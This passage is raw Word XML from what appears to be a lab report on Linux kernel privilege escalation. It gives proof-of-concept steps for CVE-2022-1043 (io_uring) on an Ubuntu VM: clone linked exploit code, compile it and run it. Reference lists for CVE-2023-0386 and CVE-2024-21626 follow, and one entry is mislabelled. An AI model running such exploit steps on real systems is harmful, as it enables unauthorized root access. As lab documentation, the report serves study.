      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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F7">
      <w:pPr>
        <w:spacing w:after="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References:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2023-0386/README.md at master · sxlmnwb/CVE-2023-0386 · GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NVD - CVE-2023-0386 (nist.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">The OverlayFS vulnerability CVE-2023-0386: Overview, detection, and remediation | Datadog Security Labs (datadoghq.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">
      <w:pPr>
        <w:spacing w:after="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C">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FD">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FE">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FF">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POC: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000200">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CVE ID: CVE-2022-1043</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201">
      <w:pPr>
        <w:spacing w:after="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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: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A flaw was found in the Linux kernel’s io_uring implementation. This flaw allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000202">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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03">
      <w:pPr>
        <w:spacing w:after="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Target VM: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">
      <w:pPr>
        <w:spacing w:after="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OS: Ubuntu(64x)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000205">
      <w:pPr>
        <w:spacing w:after="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Kernel: 5.13.12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000206">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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07">
      <w:pPr>
        <w:spacing w:after="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Exploit Code:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">View Exploit Code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000208">
      <w:pPr>
        <w:spacing w:after="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09">
      <w:pPr>
        <w:spacing w:after="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Steps for Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020A">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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Step 1: Install build tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020B">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="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sudo apt install build-essential</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020C">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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Step 2</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Clone the repository </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360"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b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/opensrcsec/main/cve-2022-1043.c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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Step 3: Compile the code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360"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2"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -pthread cve-2022-1043.c -o cve-2022-1043</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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Step 4: Execute the code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000211">
      <w:pPr>
        <w:spacing w:after="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./cve-2022-1043</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000212">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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13">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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14">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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15">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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16">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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17">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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18">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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19">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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1B">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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1D">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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POC:   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021E">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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734050" cy="2879882"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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734050" cy="2879882"/>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after="0" w:line="36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References:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000220">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NVD - CVE-2022-1043 (nist.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000221">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">io_uring Same Type Object Reuse Priv Esc (rapid7.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000222">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">same_type_object_reuse_exploits/cve-2022-1043.c at main · opensrcsec/same_type_object_reuse_exploits · GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">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4">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5">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6">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7">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8">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9">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A">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B">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C">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D">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E">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F">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0">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1">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2">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3">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234">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5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory Setup in Ubuntu </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://thesecmaster.com/blog/step-by-step-procedure-to-set-up-an-active-directory-on-ubuntu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276"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237">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NVD - CVE-2019-21626 (n.d.).</w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId40">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2024-21626</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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239">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub - NitroCao/CVE-2024-21626: PoC and Detection for CVE-2024-21626  </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/NitroCao/CVE-2024-21626</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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23B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-21626: container breakout through process.cwd trickery and leaked fds · Issue #4080 · Azure/AKS · GitHub </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Azure/AKS/issues/4080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023C">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276"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D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NVD - CVE-2023-0386 (n.d.-b).</w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId44">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2023-0386</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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23F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NVD - CVE-2022-1043. (n.d.).</w:t>
      </w:r>
      <w:hyperlink r:id="rId45">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
